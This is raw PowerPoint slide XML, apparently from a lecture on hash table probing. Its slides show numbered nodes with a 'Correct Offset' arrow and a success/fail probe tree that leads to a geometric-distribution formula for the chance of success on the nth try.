            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Oval 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="48006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1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Oval 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="54102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2</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Oval 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810000" y="51054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4</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Oval 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="56388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3</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Oval 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="51816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7</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Oval 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="47244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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Oval 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="5791200"/>
            <a:ext cx="609600" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39" name="Straight Arrow Connector 38"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="35" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="5486400" y="5257800"/>
            <a:ext cx="1600200" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="TextBox 40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010400" y="4800600"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Correct</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Offset</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3588155026"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000" advTm="66802"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="slow" advTm="66802"/>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With Replacement</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pr[Success</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on exactly nth try]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="5410200"/>
            <a:ext cx="1219200" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>Probe 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="6172200"/>
            <a:ext cx="1219200" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>Success</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Arrow Connector 15"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="5600700"/>
            <a:ext cx="838200" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1447800" y="4724400"/>
            <a:ext cx="1143000" cy="876300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="4267200"/>
            <a:ext cx="1219200" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>Fail, Probe 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="latex-image-1.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1130300" y="4749800"/>
            <a:ext cx="715347" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 39"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2667000" y="4648200"/>
            <a:ext cx="1981200" cy="914400"/>
            <a:chOff x="2667000" y="4648200"/>
            <a:chExt cx="1981200" cy="914400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3429000" y="5181600"/>
              <a:ext cx="1219200" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
                <a:t>Success</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2667000" y="4648200"/>
              <a:ext cx="838200" cy="571500"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2971800" y="2971800"/>
            <a:ext cx="2057400" cy="1333500"/>
            <a:chOff x="2971800" y="2971800"/>
            <a:chExt cx="2057400" cy="1333500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2971800" y="3429000"/>
              <a:ext cx="1143000" cy="876300"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="TextBox 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3810000" y="2971800"/>
              <a:ext cx="1219200" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
                <a:t>Fail, Probe 3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5791200" y="1752600"/>
            <a:ext cx="1219200" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>Fail, Probe 4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="2743200"/>
            <a:ext cx="1219200" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>Success</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="2209800"/>
            <a:ext cx="838200" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Arrow Connector 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6248400" y="1143000"/>
            <a:ext cx="914400" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="3886200"/>
            <a:ext cx="1219200" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>Success</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4191000" y="3352800"/>
            <a:ext cx="838200" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Arrow Connector 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4572000" y="2133600"/>
            <a:ext cx="1143000" cy="876300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 29" descr="latex-image-1.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="4800600"/>
            <a:ext cx="393700" cy="584200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Picture 30" descr="latex-image-1.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267200" y="3581400"/>
            <a:ext cx="393700" cy="584200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Picture 31" descr="latex-image-1.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="2286000"/>
            <a:ext cx="393700" cy="584200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rectangle 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5638800" y="4876800"/>
            <a:ext cx="2971800" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>Geometric dist.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>p=</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 28" descr="latex-image-1.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2728426" y="3351953"/>
            <a:ext cx="715347" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="Picture 34" descr="latex-image-1.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4313853" y="2148417"/>
            <a:ext cx="715347" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="latex-image-1.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7391400" y="5435600"/>
            <a:ext cx="393700" cy="584200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
